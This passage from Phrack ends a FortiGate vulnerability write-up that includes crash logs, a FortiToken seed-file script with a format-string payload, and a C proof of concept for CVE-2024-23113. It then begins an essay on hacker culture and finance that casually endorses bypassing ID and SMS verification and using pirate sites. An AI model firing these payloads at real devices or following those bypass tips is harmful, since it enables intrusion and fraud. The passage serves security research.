<02946> firmware FortiGate-VM64 v7.2.7,build1577b1577,240131 (GA.M) (Release)
<02946> application httpsd
<02946> *** signal 11 (Segmentation fault) received ***
<02946> Register dump:
<02946> RAX: 0000000010c9dde0 RBX: 0000000010caf09c
<02946> RCX: 00007fffd366e008 RDX: 00007f132d45bfc0
<02946> R08: 0000000010c97050 R09: 00007f132d49abe0
<02946> R10: 0000000000004000 R11: 0000000000000000
<02946> R12: 00007fffd3668570 R13: 0000000000001337
<02946> R14: 0000000000000009 R15: 00000000000006d9
<02946> RSI: 00007fffd366a288 RDI: 00007fffd366e000
<02946> RBP: 00007fffd3668dd0 RSP: 00007fffd3668480
<02946> RIP: 00007f132d346c6c EFLAGS: 0000000000010212
<02946> CS: 0033 FS: 0000 GS: 0000
<02946> Trap: 000000000000000e Error: 0000000000000004
<02946> OldMask: 0000000000000000
<02946> CR2: 00007fffd366e000
<02946> stack: 0x7fffd3668480 - 0x7fffd366d490
<02946> Backtrace:
<02946> [0x7f132d346c6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<02946> [0x7f132d34905d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<02946> [0x7f132d35c826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<02946> [0x7f132d335d42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<02946> [0x0222351b] => /bin/httpsd
<02946> [0x02223a65] => /bin/httpsd
<02946> [0x00ddb567] => /bin/httpsd
<02946> [0x00d08dc4] => /bin/httpsd
<02946> [0x00d09419] => /bin/httpsd
<02946> [0x00d0b547] => /bin/httpsd
<02946> [0x00d0d01d] => /bin/httpsd
<02946> [0x00caeef9] => /bin/httpsd
<02946> [0x00e9984a] => /bin/httpsd (ap_run_handler+0x0000004a)
<02946> [0x00e9a0a6] => /bin/httpsd (ap_invoke_handler+0x000000c6)
<02946> [0x00ee1ec9] => /bin/httpsd
<02946> [0x00ee2111] => /bin/httpsd (ap_process_request+0x00000021)
<02946> [0x00eda23f] => /bin/httpsd
<02946> [0x00e9e0aa] => /bin/httpsd (ap_run_process_connection+0x0000004a)
<02946> [0x00eb3cb7] => /bin/httpsd
<02946> [0x00eb3f86] => /bin/httpsd
<02946> [0x00eb4174] => /bin/httpsd
<02946> [0x00eb47ad] => /bin/httpsd
<02946> [0x00eafa51] => /bin/httpsd (ap_run_mpm+0x00000061)
<02946> [0x00eaf586] => /bin/httpsd
<02946> [0x00449f6f] => /bin/httpsd
<02946> [0x0044f498] => /bin/httpsd
<02946> [0x0044fc8a] => /bin/httpsd
<02946> [0x004524af] => /bin/httpsd
<02946> [0x00452dd9] => /bin/httpsd
<02946> [0x7f132d305deb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<02946> [0x004450da] => /bin/httpsd
R13 contains 0x1337, which just so happens to be the exact number of bytes
we just printed with %4919$1$c. Looks like a vuln to me!
---- [ 2.2 - FortiToken import
MFA solves all security problems, and Fortinet makes MFA easy with
FortiTokens. Let's generate some FortiToken seed files:
----- ftk.py -----
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# lol hardcoded key
FTK_KEY="3F2FE4F6E40B53CFF0B5948993F4D4AB369C7F0375FDC92D64CB3E8880FFAE4E"
FTK_KEY=bytes.fromhex(FTK_KEY)
format_str=b'%4919$1$c%n%n%n '
iv=b'\0'*16
a=Cipher(algorithms.AES(FTK_KEY), modes.CBC(iv), backend=default_backend())
e=a.encryptor()
ct=e.update(format_str)
ciphertext=base64.b64encode(ct).decode()
print(f"FTK00000000000EA,{ciphertext},{iv.hex()}")
------ ftk.py -----
$ python3 ftk.py > poc.ftk
Importing a seed file is easy:
1. User & Authentication -> FortiTokens -> Create New -> Import -> Seed File
2. Upload poc.ftk
Hmm... what's this? Another error? Let's see what the crashlog has to say:
<02664> firmware FortiGate-VM64 v7.2.7,build1577b1577,240131 (GA.M) (Release)
<02664> application httpsd
<02664> *** signal 11 (Segmentation fault) received ***
<02664> Register dump:
<02664> RAX: 0000000010da2830 RBX: 0000000010db020c
<02664> RCX: 00007ffd536af008 RDX: 00007fd3f60e3fc0
<02664> R08: 0000000010d981c0 R09: 00007fd3f6122be0
<02664> R10: 0000000000000010 R11: 0000000000000000
<02664> R12: 00007ffd536a7900 R13: 0000000000001337
<02664> R14: 0000000000000004 R15: 0000000000000a67
<02664> RSI: 00007ffd536a9618 RDI: 00007ffd536af000
<02664> RBP: 00007ffd536a8160 RSP: 00007ffd536a7810
<02664> RIP: 00007fd3f5fcec6c EFLAGS: 0000000000010212
<02664> CS: 0033 FS: 0000 GS: 0000
<02664> Trap: 000000000000000e Error: 0000000000000004
<02664> OldMask: 0000000000000000
<02664> CR2: 00007ffd536af000
<02664> stack: 0x7ffd536a7810 - 0x7ffd536acfc0
<02664> Backtrace:
<02664> [0x7fd3f5fcec6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<02664> [0x7fd3f5fd105d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<02664> [0x7fd3f5fe4826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<02664> [0x7fd3f5fbdd42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<02664> [0x0290048a] => /bin/httpsd
<02664> [0x00de6fbd] => /bin/httpsd
<02664> [0x00d08dc4] => /bin/httpsd
<02664> [0x00d09419] => /bin/httpsd
<02664> [0x00d0b547] => /bin/httpsd
<02664> [0x00d0d01d] => /bin/httpsd
<02664> [0x00caeef9] => /bin/httpsd
<02664> [0x00e9984a] => /bin/httpsd (ap_run_handler+0x0000004a)
<02664> [0x00e9a0a6] => /bin/httpsd (ap_invoke_handler+0x000000c6)
<02664> [0x00ee1ec9] => /bin/httpsd
<02664> [0x00ee2111] => /bin/httpsd (ap_process_request+0x00000021)
<02664> [0x00eda23f] => /bin/httpsd
<02664> [0x00e9e0aa] => /bin/httpsd (ap_run_process_connection+0x0000004a)
<02664> [0x00eb3cb7] => /bin/httpsd
<02664> [0x00eb3f86] => /bin/httpsd
<02664> [0x00eb3fcb] => /bin/httpsd
<02664> [0x00eb48e5] => /bin/httpsd
<02664> [0x00eafa51] => /bin/httpsd (ap_run_mpm+0x00000061)
<02664> [0x00eaf586] => /bin/httpsd
<02664> [0x00449f6f] => /bin/httpsd
<02664> [0x0044f498] => /bin/httpsd
<02664> [0x0044fc8a] => /bin/httpsd
<02664> [0x004524af] => /bin/httpsd
<02664> [0x00452dd9] => /bin/httpsd
<02664> [0x7fd3f5f8ddeb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<02664> [0x004450da] => /bin/httpsd
Unsurprisingly, this crash looks almost identical to the last one. The only
difference is the stack trace, which shows
(__snprintf+0x00000092) liboffset 00053d42
[0x0290048a] => /bin/httpsd
[0x00de6fbd] => /bin/httpsd
[0x00d08dc4] => /bin/httpsd
rather than
(__snprintf+0x00000092) liboffset 00053d42
[0x0222351b] => /bin/httpsd
[0x02223a65] => /bin/httpsd
[0x00ddb567] => /bin/httpsd
---- [ 2.3 - CVE-2024-23113
Does CVE-2024-23113 sound too complicated? In reality, it's as shrimple as
#include
#include
#include
#include
#include
#include
char *payload=\
"reply 200\r\n"\
"request=auth\r\n"\
"mgmtip=%270441$1$c%n%n%n%n%n%n%n%n%n%n\r\n"\
"\r\n";
#define HOST "69.69.69.69"
#define PORT 541
#define KEYFILE "key.pem"
#define CERTFILE "cert.pem"
void main(){
int sock;
struct sockaddr_in sa={0};
SSL_CTX *ctx;
SSL *ssl;
const SSL_METHOD *method;
uint32_t len_be;
char *fgfm_magic="\x36\xe0\x11\x00";
method=TLS_server_method();
ctx=SSL_CTX_new(method);
SSL_CTX_use_certificate_file(ctx, CERTFILE, SSL_FILETYPE_PEM);
SSL_CTX_use_PrivateKey_file(ctx, KEYFILE, SSL_FILETYPE_PEM);
sock=socket(AF_INET, SOCK_STREAM, 0);
sa.sin_family=AF_INET;
sa.sin_port=htons(PORT);
sa.sin_addr.s_addr=inet_addr(HOST);
connect(sock, &sa, sizeof(struct sockaddr));
ssl=SSL_new(ctx);
SSL_set_fd(ssl, sock);
if(SSL_accept(ssl)<=0)
ERR_print_errors_fp(stderr);
else{
len_be=htonl(strlen(payload)+1+8);
SSL_write(ssl, fgfm_magic, 4);
SSL_write(ssl, &len_be, 4);
SSL_write(ssl, payload, strlen(payload)+1);
}
SSL_shutdown(ssl);
SSL_free(ssl);
close(sock);
SSL_CTX_free(ctx);
}
Just change the HOST and provide a key.pem/cert.pem. The hardest part about
developing a crash POC was realizing the TCP client is acting as the TLS
server. The protocol itself is just a magic number, size field, and
text-based body.
<23066> firmware FortiGate-VM64 v7.2.4,build1396b1396,230131 (GA.F)
(Release)
<23066> application fgfmsd
<23066> *** signal 11 (Segmentation fault) received ***
<23066> Register dump:
<23066> RAX: 00007f652c3d2040 RBX: 00007f652c8f7844
<23066> RCX: 00007ffd3fe86008 RDX: 00007f6531e7afc0
<23066> R08: 00007f652c3cf010 R09: 0000000000000000
<23066> R10: 0000000000000022 R11: 0000000000000246
<23066> R12: 00007ffd3fe83780 R13: 0000000000042069
<23066> R14: 000000000000000b R15: 0000000000000303
<23066> RSI: 00007ffd3fe84138 RDI: 00007ffd3fe86000
<23066> RBP: 00007ffd3fe83fe0 RSP: 00007ffd3fe83690
<23066> RIP: 00007f6531d65c6c EFLAGS: 0000000000010212
<23066> CS: 0033 FS: 0000 GS: 0000
<23066> Trap: 000000000000000e Error: 0000000000000004
<23066> OldMask: 0000000000000000
<23066> CR2: 00007ffd3fe86000
<23066> stack: 0x7ffd3fe83690 - 0x7ffd3fe854d0
<23066> Backtrace:
<23066> [0x7f6531d65c6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<23066> [0x7f6531d6805d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<23066> [0x7f6531d7b826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<23066> [0x7f6531d54d42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<23066> [0x00acc6aa] => /bin/fgfmd
<23066> [0x00acd30c] => /bin/fgfmd
<23066> [0x00acdcef] => /bin/fgfmd
<23066> [0x00aee12a] => /bin/fgfmd
<23066> [0x00ae8674] => /bin/fgfmd
<23066> [0x00ad60ba] => /bin/fgfmd
<23066> [0x00ae1d11] => /bin/fgfmd
<23066> [0x00449eaf] => /bin/fgfmd
<23066> [0x004531da] => /bin/fgfmd
<23066> [0x0044fd9c] => /bin/fgfmd
<23066> [0x00452428] => /bin/fgfmd
<23066> [0x00452d71] => /bin/fgfmd
<23066> [0x7f6531d24deb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<23066> [0x00444f1a] => /bin/fgfmd
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x11 of 0x11
|=-----------------------------------------------------------------------=|
|=-----------------------=[ Calling All Hackers ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ cts (@gf_256) ]=--------------------------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
0 - Preamble
1 - About the Author
2 - The Birth of a Shitcoin
3 - How Money Works
3.1 - Fixed Income
3.2 - Equities
3.3 - Shareholder Value
4 - Startup Blues
5 - Takeaways
6 - Thanks
7 - References
8 - Appendix
--[ 0 - Preamble
Hi.
I'm cts, also known as gf_256, ephemeral, or a number of other handles.
I am a hacker and now a small business owner and CEO. In this article,
I would like to share my experience walking these two different paths.
A hacker is someone who understands how the world works. It's about
knowing what happens when you type "google.com" and press Enter. It's
about knowing how your computer turns on, about memory training, A20,
all of that. It's about modern processors, their caches, and their side
channels. It's about DSi bootloaders and how the right electromagnetic
faults can be used to jailbreak them. And it's about how Spotify and
Widevine and AES and SGX work so you can free your music from the
shackles of DRM.
But being a hacker is so much more than these things. It's about knowing
where to find things. Like libgen and Sci-Hub and nyaa. Or where to get
into the latest IDA Pro group buy. Or which trackers have what and how
to get into them.
It's about knowing how to bypass email verification. How to bypass SMS
verification. How to bypass that stupid fucking verification where you
hold your driver's license up to a webcam (thank you, OBS virtual camera!)
Having an actual threat model not just paranoia. Knowing that you're not
worth burning a 0day on, but reading indictments to learn from others'
mistakes.
It's about knowing where to buy estradiol valerate on the internet and how
to compound injections. Or the "bodybuilder method" to order your own
blood tests when your state requires a script to do so. It's about knowing
which shipments give the US CBP a bad vibe and which don't.
It's about knowing what happens when you open Robinhood and giga long NVDA
FDs. I mean the actual market microstructure, not "Ken Griffin PFOF bad".
Then using that microstructure to find an infinite money glitch (high
Sharpe!). It's about knowing how to get extra passports and reading the
tax code.
It's about knowing how to negotiate your salary (or equity). It's about
knowing why things at the supermarket cost what they do. Or how that awful
shitcoin keeps pumping. And why that dogshit startup got assigned that
insane valuation. And understanding who really pays for it in the end
(hint: it's you).
My point is, it is not just about computers. It's about understanding how
the world works. The world is made up of people. As much as machines keep
society running, those machines are programmed by people--people with
managers, spouses, and children; with wants, needs, and dreams. And it is
about using that knowledge to bring about the change you want to see.
That is what being a hacker is all about.
--[ 1 - About the Author
I have been a hacker for 13 years. Prior to founding Zellic, I helped
start a CTF team called perfect blue (lately Blue Water). We later became
the number one ranked CTF team in the world. We've played in DEF CON CTF.
We've won GoogleCTF, PlaidCTF, and HITCON. It's like that scene from
Mr. Robot but not cringe.
In 2021, we decided to take that hacker friend circle and form a security
firm. It turned out that crypto paid well, so we worked with a lot of
crypto clients. In the process, we encountered insane, hilarious, and
depressingly sobering bullshit. In this article, I will tell some stories
about what that bullshit taught me, so you can benefit from the same
lessons as I have.
Markets are computers; they compute prices, valuations, and the allocation
of resources in our society. Hackers are good at computers. Let's learn
more about it.
--[ 2 - The Birth of a Shitcoin
I can't think of a better example than shitcoins. Let's look at the
crypto markets in action.
First, let's talk about tokens. What is their purpose? The purpose of a
token is to go up. There is no other purpose. Token go up. This is
important, remember this point.
Now the question is, how do we make the token go up? In crypto, there are
two main kinds of token deals. Let's call them the Asian Arrangement and
the Western Way.
The Asian Arrangement is a fairly straightforward pump and dump. It's a
rectangle between the VC, the Market Maker, the Crypto Exchange, and the
Token Project Founder.
1. The exchange's job is to list the token, bringing in investors. They
get paid in a mix of tokens and cold, hard cash. Their superpower is
owning the customer relationships with the retail users, and the
naming rights to sports arenas.
2. The market maker provides liquidity so the market looks really
healthy and well-traded so it is easy to buy the token. In good
deals, they are paid in in-the-money call options on the tokens,
so they are incentivized to help the token trade well. Their
superpower is having a lot of liquidity to deploy, and people
on PagerDuty.
3. The founder's job is to pump the token and shill it on Twitter.
They are the hype man, and it's their job to drum up the narrative
and pump everyone's bags. Their unique power is they can print more
tokens out of thin air, and this is in large part how they get paid
in this arrangement.
4. Lastly, the VC gets paid to organize the deal. They give the founders
some money, who in return give a pinky promise that they will give
the VC a lot of tokens once the tokens actually exist. This is known
as a Simple Agreement for Future Tokens, or SAFT. Their superpower is
dressing up the founders and project so it seems like the Next Big
Thing instead of a Ponzi scheme.
Everyone gets paid a ton of token exposure (directly or indirectly),
and when it lists, it pumps. Then the insiders dump and leave with a
fat stack. Except retail, they end up with the bag.
Sometimes the listing doesn't go well for the organizers, in which case,
better luck next time. But retail always loses.
wtf??? LFG!!! to the moon
,o \oXo/\o/
/v | | |
/\ / X\ / \
crypto investors
^ |
| |
| v
+----------+ provides liquidity +--------+
| Crypto | <--------------------------------------- | Market |
| Exchange | ----------------------------------------> | Maker |
+----------+ maker fees +--------+
^ | ^
fees, | | listing options |
tokens | | / fees |
| | +-------------------------------------------------+
| v |
+---------+ tokens / SAFT / token warrants +---------+
| Token | ---------------------------------------> | Venture |
| Project | <--------------------------------------- | Capital |
+---------+ cash , intros to CEX / MM, shilling +---------+
This machine worked exceptionally well in 2017, especially before China
banned crypto. All those ICO shitcoins? Asian Arrangement. And it still
works well to this day, except people are more wary of lockups and vesting
schedules and so on.
Now let's discuss the Western Way. The Asian Arrangement? That old pump
and dump? No sir, we are civilized people. Instead, our VCs *add value*
to their investments by telling the world "how disruptive the tech is"
and how the "team are incredible outliers". And they will not blatantly
PnD the token, but instead they will fund "projects in the ecosystem" so
it appears there is real activity happening on the platform.
This is to hype up metrics (like TPS or TVL) to inflate the next round
valuation. Anyways, then they dump. Or maybe the VC is also a market
maker so they market make their portfolio company tokens. Overall it's
the same shit (Ponzi) but dressed up in a nicer outfit.
Asian Arrangement or Western Way--either way, if you're the token founder,
your main priority is to just GO TO MARKET NOW and LAUNCH THE TOKEN. This
is so you can collect your sweet bag and dump some secondary before
someone else steals the narrative or the hype cycle moves on.
This is one of the reasons there are so many hacks in crypto. The code is
all shitty because it's rushed out as fast as possible by 20-something-
year-old software engineers formerly writing Typescript and Golang at
Google. Pair that with some psycho CEO product manager. Remember, it is
not about WRITING SECURE CODE, it is about SHIPPING THE FUCKING PRODUCT.
Good luck rewriting it in Rust!
All of this worked well until Luna, then 3AC, Genesis, and FTX imploded in
2022. It still works, but you have to be less blatant now.
Shitcoins do serve an essential need. They are an answer to financial
nihilism. Many people are working dead-end wage slave jobs that are not
enough to "make it". They feel trapped and forced to work at jobs they
fucking hate and waste their life doing pointless shit to generate
shareholder value. This kind of life feels unacceptable, yet there are
few avenues out. So what is the only "attainable" solution left? Gamble
it on shitcoins, and if you lose...maybe next paycheck will be better.
But enough about crypto, let's talk about securities.
--[ 3 - How Money Works
----[ 3.1 - Fixed Income
First, let's start with fixed income. I'm talking boring, old-fashioned
bonds, like Treasury bonds. A lot of people are introduced nowadays to
finance through equities (stocks) and tokens. In my opinion, this is
only half of the story. Fixed income is the bedrock of finance. It has
fundamental value. It provides a prototypical asset that all assets can
be benchmarked based on.
Fixed income assets, like bonds, boil down to borrowing and lending. A
bond is basically an IOU for someone to pay you in the future. It is more
useful to have a dollar today than in a year, so lenders charge a fee for
access to money today. This fee is known as interest, and how it is baked
into the equation varies from asset-to-asset. Some bonds come with
interest payments, whereas other bonds are zero-coupon. The most important
thing is to remember that bonds are essentially an IOU to pay $X in the
future.
Here is an example. Let's say you would like to borrow $100 to finance an
upcoming project. The interest rate will be 5% per year. To borrow money,
you would issue (mint) a bond (an IOU) for $X+5 dollars to be repaid 1
year in the future. In exchange for this fresh IOU, the lender will give
you $X dollars now.
On the lender's balance sheet, they will be less $X dollars worth of cash,
but will also have gained ($X+5) dollars worth of an asset (your IOU),
creating $5 of equity. In contrast, you would have $X more cash in assets,
but also an ($X+5) liability, creating -$5 of equity.
This example also works for depositing money at a bank. Here, you are the
lender, and the bank is the borrower. Your deposits would be liabilities
on their balance sheet, as they are liable to pay you back the deposit if
you choose to withdraw it.
Lender's Balance Sheet Borrower's Balance Sheet
=========================== ===========================
Assets: Assets:
IOU-----------------X+5 Cash------------------X
Liabilities: Liabilities:
Cash----------------(X) IOU-----------------X+5
Equity: Equity:
Equity----------------5 Equity--------------(5)
Fixed income assets are extremely simple. There are various risks (credit
risk, interest rate risk, etc.), but excluding these factors, you
essentially get what you pay for. Unlike a token or stock, the bond is not
going to suddenly evaporate or crash. (In theory.) Because of this, they
can be modeled in a straightforward way; a way so straightforward even
a high school student can understand it.
Let's say I have $X today. Suppose the prevailing (risk-free) interest
rate is 5%. What is the value of this $X in a year? Obviously, it would be
no less than $X*1.05, as I can just lend it out for 5% interest and get
$X*1.05 back in a year. If you gave me the opportunity to invest in any
asset yielding less than 5%, this would be a bad deal for me, since I
could just lend it out myself to get 5% yield.
Now, let's analyze the same scenario, but in reverse. Let's take that IOU
from earlier. What is the value *today* of a (risk-free) $X IOU, due in 1
year? It would be worth no more than $X/1.05. This is because with $X/1.05
dollars today, I could lend it out and collect 5% interest to end up with
$X again in the future. If I pay more than $X/1.05, I am getting a bad
deal, since I am locking up my money with you when it would be more
capital efficient to just lend it out myself.
You can probably see where I am going with this. The present value of an
$X IOU at some time *t* in the future is $X/(1+r)^t, where *r* is the
discount rate. The discount rate describes the "decay" of the value over
time, due to interest but also factors like potential failure of the asset
(for example, if the asset is a company, business failure of the company).
Now, if we have some asset which pays a series of future cash flows
*f(t)*, we can model this asset as a bundle of IOUs with values f(t) due
in time 1, 2, 3, and so on. Then the present value of this asset is the
geometric series sum of the discounted future cash flows. This is called
discounted cash flows (DCF). Congrats, now you can do better modeling than
what goes into many early-stage venture deals.
+------+-----+-----+---------+---------+---------+-------+---------+
| Year | 0 | 1 | 2 | 3 | 4 | ... | t |
+------+-----+-----+---------+---------+---------+-------+---------+
| Cash | CF1 | CF2 | CF3 | CF4 | CF5 | ... | CF_t |
| Flow | | | | | | | |
+------+-----+-----+---------+---------+---------+-------+---------+
| Disc.| CF1 |_CF2_| __CF3__ | __CF4__ | __CF5__ | ... | _CF_t__ |
| Val | | 1+r | (1+r)^2 | (1+r)^3 | (1+r)^4 | | (1+r)^t |
+------+-----------+---------+---------+---------+-------+---------+
IOU 1 IOU 2 IOU 3 IOU 4 IOU 5 ... IOU n
inf
_ f(t) 1
DCF = \ ------- = (assume constant annual cash flow x) = --------- x
/_ (1+r)^t 1-1/(1+r)
t=0
= (1/r + 1) x
Cash flow multiple = (value) / (annual cash flow) ~= 1/r
(The astute reader might also find that they can go backwards from
valuations to estimate first, second, ... Nth derivatives of the cash
flow or the year-to-year survival chances of a company. And these can be
compared with...going outside and touching grass to see if the valuation
actually makes sense.)
At this point, you're probably wondering why I'm boring you with all of
this dry quant finance 101 shit. Well, it's a useful thing to know about
how the world works.
First, interest rates affect you directly and personally. You may have
heard of the term "zero interest rate environment". In a low interest rate
environment, cash flow becomes irrelevant. Why? Consider the DCF geometric
series sum if the interest rate r = 0. The present value approaches
infinity. If the benchmark hurdle rate we're trying to beat is 0%,
literally ANYTHING is a better investment than holding onto cash.
Now do you see why VCs were slamming hundreds of millions into blatantly
bad deals and shit companies during Covid? Cash flow and profitability
didn't matter, because you could simply borrow more money from the money
printer.
Here's a more concrete example. Do you remember a few years ago when Uber
rides were so cheap, that they were clearly losing money on each ride?
This is known as Customer Acquisition Cost, or CAC. CAC is basically the
company paying you to use their app, go to their store, subscribe to the
thing, ... whatever. The strategy is well-known: burn money to acquire
users until everyone else dies and you become a monopoly. Then raise the
prices.
But here is the key point: this only works in a low-interest rate
environment. In such an environment, discounting is low, and thus, future
growth potential is valued over profitability and fundamentals at present.
It doesn't need to make sense *today* as long as it works 10 years from
now. For now, we can keep borrowing more money to sustain the burn.
Of course, when rates go back up, the free money machine turns off and
the effects ripple outward. You are the humble CAC farmer, farming CAC
from various unprofitable consumer apps like ride share, food delivery,
whatever. These apps raise their money from their investors, VC and
growth equity funds. These funds in turn raise their money from *their*
investors, their limited partners. These LPs might be institutional
capital like pension funds, sovereign wealth funds, or family offices.
At the end of the day, all of that wealth is generated somewhere
throughout the economy by ordinary people. So when some VC-backed
founders throw an extravagant party on a boat with fundraised dollars,
in some sense, you are the one paying for it.
And when the money machine turns off, anyone who had gotten complacent
under ZIRP is now left scrambling. Companies will overhire during ZIRP
only to do layoffs when rates go up.
+=========================+
| THE LIQUIDITY CYCLE |
+=========================+
VENTURE CAPITAL
_______________ ,.-^=^=^=^=^=^=^=^=^=^;,
,;===============>> E^ a16z LSVP Tiger '^3.
.;^ E^ FF Social Cap. '^3
// condensation .E Bain SoftBank Accel 3^
/|^ ^E KP Benchmark :^
|| ^;: YC Greylock GC ;3'
,.^-^-^-^-^-^-^-^-^-^-^;, ^.=.=_=_=_=_=_=_=_=_=_=_=^
E^ endowments family '^:. \\\\\\\\\\\\\\\\\\\\
E^ offices '^3 \\\\\\\\\\\\\\\\\\\\
E' pension ^3. SOURCE \\\ precipitation \\
^; funds sovereign 3.' CAPITAL \\\\\\\\\\\\\\\\\\\\
E;: wealth funds ,3^ (LPs) \\\\\\\\\\\\\\\\\\\\
^;._.._._._._._._._._._._,^ \\\\\\\\\\\\\\\\\\\\
/\
^ ^ ^ ^ ^ ^ ^ ^ gamefi /\ /\ uber eats
| | | | | | | | shitcoins/::\/::\ /::::\ /\
| evaporation | / doordash/^^^^^^\ /^^\
| | | | | | | | ____________ / \ / hello \
(poggers desu) /_____ lime ____ fresh ___\
\o/ \oXo/\oXoXo/ o '==========' UNPROFITABLE CONSUMER APPS
| | | | | | /|\ Oo._ /\_/\ ,///
__/_\_/_X_\/_X_X_\_/_\__ /_________(@'w'@)_____________.,://'
SOCIETY \'''''''' -...-''''''''''''''''' surface
THE HUMBLE runoff
CAC FARMER
Second, credit is not inherently a bad thing if used responsibly. Take for
example those Buy Now, Pay Later loans. Now that you are equipped with the
concept of capital efficiency, wouldn't it technically better than paying
cash to take an interest-free BNPL loan and temporarily stick the freed
cash into an investment? (Barring other side effects, etc.)
Third, the concept of net present value--i.e., credit--is the killer app
of finance. It allows you to transport value from the future into today.
Of course, that debt must be repaid in the future, unless you can figure
out a way to kick the can down the road forever.
For now, let's get back to stocks.
----[ 3.2 - Equities
Now we have seen both sides of the coin. Asset value is twofold:
speculative and fundamental.
First, we saw speculative value as illustrated by crypto meme coins. Then,
on the other hand, we examined fundamental value as illustrated by, e.g. a
US Treasury. These two lie on two extremes of a spectrum. Some sectors and
stocks are more speculative than others; Nvidia is practically a meme coin
at this point, whereas something like Coca-Cola is like fixed income for
boomers (NFA BTW). Most assets have a blend of both.
Thinking about stocks, they (usually) have some fundamental value.
Equities represent ownership of some asset, like a business. The business
in theory generates dividends for shareholders, and this cash flow (or the
net present value of future ones) represents the fundamental value of the
business. As we've seen, assets with better cash flows are more valuable.
In practice, buybacks can be used to create what is effectively a
shareholder dividend in a more tax-advantaged way. Whereas with dividends,
they are taxed as income, and this is realized immediately. With buybacks,
they are taxed as capital gains, but crucially the gains are not realized
until the asset is sold. This could be indefinitely far in the future, so
it's more capital efficient. It has the added benefit that it helps pump
the token, and imo this is kind of cute because it marries both the
fundamental and speculative aspects.
Meanwhile, like tokens, stocks are also supposed to go up. Here's an
example: imagine a generic meme coin. Apart from Go Up, what does it do?
Nothing. Even if it's a Governance Token, who cares when the founders and
VCs hold all the voting power? Anyways, I'm describing Airbnb Class A
Common Stock. Here's an excerpt from their S-1 [1] [2]:
> We have four series of common stock, Class A, Class B, Class C, and
> Class H common stock (collectively, our "common stock"). The rights of
> holders of Class A, Class B, Class C, and Class H common stock are
> identical, except voting and conversion rights ... Each share of Class A
> common stock is entitled to one vote, each share of Class B common stock
> is entitled to 20 votes and is convertible at any time into one share of
> Class A common stock ... Holders of our outstanding shares of Class B
> common stock will beneficially own 81.7% of our outstanding capital
> stock and represent 99.0% of the voting power of our outstanding capital
> stock immediately following this offering, ...
Name of | Class B | % | % of Vot-
Beneficial Owner | Shares | | ing Power
-------------------------------------+------------+-------+-----------
Brian Chesky | 76,407,686 | 29.1% | 27.1%
Nathan Blecharczyk | 64,646,713 | 25.3% | 23.5%
Joseph Gebbia | 58,023,452 | 22.9% | 21.4%
Entities Affil. w/ Sequoia Capital | 51,505,045 | 20.3% | 18.9%
Why do people buy tech stocks with inflated valuations? Some may because
they believe that they will go up, that they will be more dominant,
important, and valuable in the future. Like tokens, a large part of
stocks' value is speculative. They are expressing their opinion on the
future fundamentals. Others may simply because they believe others will
believe that it is more valuable. Not fundamentals, this is an opinion
about *pumpamentals*.
Importantly, unlike fundamental value, speculative value can be created
out of thin air. It is minted by *fiat*. Fundamental value is difficult
to create, whereas speculative value can be created through hype and
psychology alone.
----[ 3.3 - Shareholder Value
For stocks, there are usually laws in place to protect investors, pushing
the balance between "speculation" and "fundamentals" towards the latter.
As a result, firms are generally legally obligated to act in their
shareholders' best interests. This is good because normal people will be
able to participate in the wealth generated by companies. And obviously,
companies should not defraud their investors.
However, the biggest *stake* holders in a business, are usually (in order):
1. The employees. No matter what, no one else is spending 8 hours a day,
or ~33% of their total waking lifespan at this place. Whatever it is,
I guarantee you the employees feel it the most.
2. The customers. The customers are the reason the business is able to
exist in the first place. Non-profits are not exempt: their customers
are their donors.
3. The local community / local environment / ecosystem. The business
doesn't exist in a vacuum. The business has externalities, and those
externalities affect most the immediate surrounding environment.
4. And in last place, the shareholders. They do not really do anything
except contribute capital and hold the stock. Of course capital is
important but they are not spending 8 hours a day here, they are not
the reason the business exists, and in fact they might even live in a
totally different country.
For large, publicly-listed companies, the shareholders have one more
unique difference from the other three stakeholders: liquidity. This
difference is critical.
Liquidity describes how easy it is to buy and sell an asset. A dollar
bill is liquid. Bitcoin is liquid. A house is relatively illiquid. Stock
in large, publicly-listed companies is also liquid. A shareholder can buy
a stock one day and sell it the next. As a result, the relationship is
non-commital and opens the opportunity for short-term thinking.
There are many things a company could do which would benefit shareholders
short term, while harming the other three stakeholders long term. While a
shareholder can simply dump their position and leave, the mess created is
left for the employees, customers, and community to clean up.
(The SPAC boom was a pretty good example of this. Not all SPACs are bad,
but a lot of pretty shit businesses publicly listed through SPACs then
crashed. This is sad to me because some of that is early investors and
founders dumping on retail like a crypto shitcoin, but dressed up because
it's NYSE or NASDAQ. Get liquidity then bail.)
Now, it is a misconception that stock companies must solely paperclip-
maximize short-term shareholder value. However, this is how it often
plays out due to fucked up shit in the public markets, like annoying
activist hedge funds or executive compensation tied to stock price. And
it is true that employees can be shareholders. And that is usually a good
thing! But few public companies are truly employee-owned.
Thinking about it from this perspective, the concept of maximizing
shareholder value seems somewhat backwards. But *why* would one make
this system where the priorities are seemingly inverted?
One benefit is that it would make your currency extremely valuable.
Suppose you want to do some shit on Ethereum (speculating on some animal
